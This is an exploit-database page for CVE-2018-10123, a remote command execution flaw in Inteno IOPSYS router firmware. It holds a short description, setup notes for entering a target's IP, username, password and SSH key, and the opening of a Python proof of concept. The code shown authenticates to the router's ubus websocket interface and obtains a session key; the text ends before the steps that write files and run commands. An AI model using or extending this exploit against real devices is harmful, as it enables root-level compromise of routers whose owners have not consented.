Inteno IOPSYS 2.0 < 4.2.0 - 'p910nd' Remote Command Execution



EKU-ID: 7611 CVE: 2018-10123 OSVDB-ID:
Author: neonsea Published: 2018-05-18 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


'''
Any authenticated user can modify the configuration for it in a way which allows them to read and append to any file as root. This leads to information disclosure and remote code execution. This vulnerability has been assigned the CVE ID: CVE-2018-10123.
 
This PoC requires Python 3.6 and a module called websocket-client which you can install by evoking pip install websocket-client. Please note that if you wish to use this, you should edit lines 58-61 of the script to include the proper IP, username, password and SSH key. You may also edit line 63 to include your own code for execution.
'''
 
#!/usr/bin/python3
 
import json
import sys
import socket
import os
import time
from websocket import create_connection
 
def ubusAuth(host, username, password):
    ws = create_connection("ws://" + host, header = ["Sec-WebSocket-Protocol: ubus-json"])
    req = json.dumps({"jsonrpc":"2.0","method":"call",
        "params":["00000000000000000000000000000000","session","login",
        {"username": username,"password":password}],
        "id":666})
    ws.send(req)
    response =  json.loads(ws.recv())
    ws.close()
    try:
        key = response.get('result')[1].get('ubus_rpc_session')
    except IndexError:
        return(None)
    return(key)